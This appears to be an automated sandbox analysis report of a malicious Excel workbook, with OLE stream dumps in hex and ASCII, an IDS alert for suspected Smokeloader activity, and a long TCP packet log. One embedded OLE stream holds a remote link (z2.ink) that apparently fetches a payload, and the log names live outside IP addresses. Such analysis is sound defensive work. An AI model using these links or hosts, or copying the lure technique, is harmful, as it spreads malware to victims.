                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e9 9e 7d 7f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "ThisWorkbook"
                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.25248375192737
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:244
                                Entropy:2.889430592781307
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                General
                                Stream Path:\x5SummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:200
                                Entropy:3.2403503175049813
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . + T . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                General
                                Stream Path:MBD0005BCAB/\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:99
                                Entropy:3.631242196770981
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0005BCAB/Package
                                CLSID:
                                File Type:Microsoft Excel 2007+
                                Stream Size:15123
                                Entropy:7.515211324577382
                                Base64 Encoded:True
                                Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0005BCAC/\x1Ole
                                CLSID:
                                File Type:data
                                Stream Size:566
                                Entropy:4.875954031781335
                                Base64 Encoded:False
                                Data ASCII:. . . . 5 m 7 u [ b . . . . . . . . . . . . t . . . y . . . K . p . . . h . t . t . p . : . / . / . z . 2 . . . i . n . k . / . z . B . O . D . . . k M . S z . . u 4 * > . m z C . n L . T k . m . . _ q . k @ 5 ' g 6 K , . @ . . . . . . . . . . . . . . . . b . . . e . 1 . M . N . 5 . C . L . h . v . W . L . y . p . i . 4 . i . Y . W . S . N . Y . 0 . y . f . Z . B . Y . S . e . Y . 7 . t . o . M . D . k . j . f . Y . h . E . a . j . F . k . v . w . n . N . x . Z . 5 . e . H . U . 9 . V . Q . a . a . Y . w
                                Data Raw:01 00 00 02 35 ec 6d 37 75 5b e4 62 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 70 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 7a 00 32 00 2e 00 69 00 6e 00 6b 00 2f 00 7a 00 42 00 4f 00 44 00 00 00 c1 6b 4d e4 ce 12 53 8d 7a 7f cc 9d 75 34 bf c0 e8 95 c1 20 a6 2a 3e b3 83 de b3 6d 7a 43 f7 89 06 ce 6e c6 4c 14 54 a4 6b 13
                                General
                                Stream Path:Workbook
                                CLSID:
                                File Type:Applesoft BASIC program data, first line number 16
                                Stream Size:282638
                                Entropy:7.998461262302248
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . @ Z D } w . . G > . t . M > 3 . ^ s . c > \\ * e W . . . . . . . . . . . \\ . p . . c . . a i C @ C ~ z } t s P A ( V . q < X e . = G . b . . l 8 y v > - ) 5 . Q e . R I g c K . . * > h a y N f . > W P . " u B . . . K . a . . . . . . = . . . . . g . . . 7 . = . 4 . . . . . . . . . . R . . . . f . . . . . . . R . . . . ( = . . . . + 2 + . ` @ . . . 5 \\ . . . . S " . . . 4 . . . . . . . . . . g 1 . . . . . O . D . # d 9 X n a . J W $ . R X 1 . . . > *
                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 40 5a 44 96 7d 77 b4 10 19 47 3e ce 1f a6 74 9e d9 9f a7 4d e3 3e ef e6 d5 f0 83 33 ed c5 a1 5e fd 73 11 63 cf 3e ac 8e b3 5c ee 2a 65 57 90 fd e1 00 02 00 b0 04 c1 00 02 00 dc b2 e2 00 00 00 5c 00 70 00 14 63 1b 17 a9 8e 61 69 8d 20 ce dc e3 43 90 40 43 7e 95 bc b1 84 7a d8 7d 74 c7 73 d3 d0
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                CLSID:
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:527
                                Entropy:5.275130846654291
                                Base64 Encoded:True
                                Data ASCII:I D = " { F E 6 3 B 2 5 A - 0 5 3 D - 4 8 A A - A 7 9 3 - 7 2 A F 2 6 8 2 8 8 E 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C F C D 2 D 6 A 3 7 E A F 8 E E F
                                Data Raw:49 44 3d 22 7b 46 45 36 33 42 32 35 41 2d 30 35 33 44 2d 34 38 41 41 2d 41 37 39 33 2d 37 32 41 46 32 36 38 32 38 38 45 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                CLSID:
                                File Type:data
                                Stream Size:104
                                Entropy:3.0488640812019017
                                Base64 Encoded:False
                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                CLSID:
                                File Type:data
                                Stream Size:2644
                                Entropy:3.983227423902577
                                Base64 Encoded:False
                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                CLSID:
                                File Type:data
                                Stream Size:553
                                Entropy:6.356078174117573
                                Base64 Encoded:True
                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . { . c h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7b 17 63 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/28/24-09:30:54.680711TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4917880192.168.2.2277.232.129.190
                                TimestampSource PortDest PortSource IPDest IP
                                May 28, 2024 09:29:59.567631960 CEST4916380192.168.2.2254.241.153.192
                                May 28, 2024 09:29:59.572757006 CEST804916354.241.153.192192.168.2.22
                                May 28, 2024 09:29:59.572828054 CEST4916380192.168.2.2254.241.153.192
                                May 28, 2024 09:29:59.572971106 CEST4916380192.168.2.2254.241.153.192
                                May 28, 2024 09:29:59.578104973 CEST804916354.241.153.192192.168.2.22
                                May 28, 2024 09:30:00.161787987 CEST804916354.241.153.192192.168.2.22
                                May 28, 2024 09:30:00.161906958 CEST4916380192.168.2.2254.241.153.192
                                May 28, 2024 09:30:00.178615093 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.183903933 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.183995962 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.184068918 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.188966036 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678623915 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678689957 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678725958 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678761005 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678798914 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678833008 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678868055 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678900957 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678898096 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678899050 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678899050 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678899050 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678899050 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678899050 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678937912 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678951979 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678951979 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.678976059 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.678985119 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.679027081 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.683922052 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.683958054 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.684003115 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.684025049 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.684063911 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.684120893 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.685211897 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.770782948 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.770873070 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.770915985 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.770961046 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.770976067 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771012068 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771029949 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771049023 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771058083 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771083117 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771099091 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771119118 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771126986 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771173000 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771663904 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771699905 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771719933 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771735907 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771745920 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771783113 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771825075 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771861076 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.771878958 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.771907091 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772280931 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772332907 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772335052 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772371054 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772388935 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772404909 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772419930 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772439957 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772449017 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772474051 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772489071 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772521019 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772530079 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772557020 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772566080 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772592068 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772608042 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772629023 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.772643089 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772676945 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.772995949 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.773047924 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:00.860635042 CEST8049164198.46.177.156192.168.2.22
                                May 28, 2024 09:30:00.860763073 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:01.040621042 CEST4916480192.168.2.22198.46.177.156
                                May 28, 2024 09:30:01.244138956 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.249141932 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.249207973 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.249645948 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.254614115 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838568926 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838707924 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.838713884 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838726997 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838738918 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838752985 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838762045 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.838766098 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838777065 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838778019 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.838783979 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838793993 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838805914 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.838808060 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.838821888 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.838850021 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.843709946 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.843722105 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.843782902 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.843847036 CEST804916554.241.153.192192.168.2.22
                                May 28, 2024 09:30:01.843894005 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.902107000 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:01.902107000 CEST4916580192.168.2.2254.241.153.192
                                May 28, 2024 09:30:02.431607008 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:02.436825037 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:02.436988115 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:02.437015057 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:02.442336082 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037555933 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037606001 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037738085 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.037738085 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.037791967 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037902117 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.037905931 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037923098 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037938118 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037955046 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037971020 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037978888 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.037978888 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.037978888 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.037986994 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.037993908 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.038002968 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.038003922 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.038033962 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.038033962 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.038317919 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.038343906 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.042712927 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.042767048 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.042790890 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.042803049 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.043013096 CEST804916654.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.043055058 CEST4916680192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.047676086 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.052678108 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.052792072 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.052804947 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.057684898 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646497965 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646553040 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646569967 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646586895 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646598101 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646601915 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646598101 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646617889 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646629095 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646629095 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646635056 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646651983 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646667957 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646681070 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646681070 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646681070 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646686077 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.646706104 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646706104 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.646725893 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.647187948 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.647187948 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.651699066 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.651766062 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.651807070 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.651807070 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.653054953 CEST804916754.241.153.192192.168.2.22
                                May 28, 2024 09:30:03.653116941 CEST4916780192.168.2.2254.241.153.192
                                May 28, 2024 09:30:03.705657959 CEST4916880192.168.2.2254.241.153.192
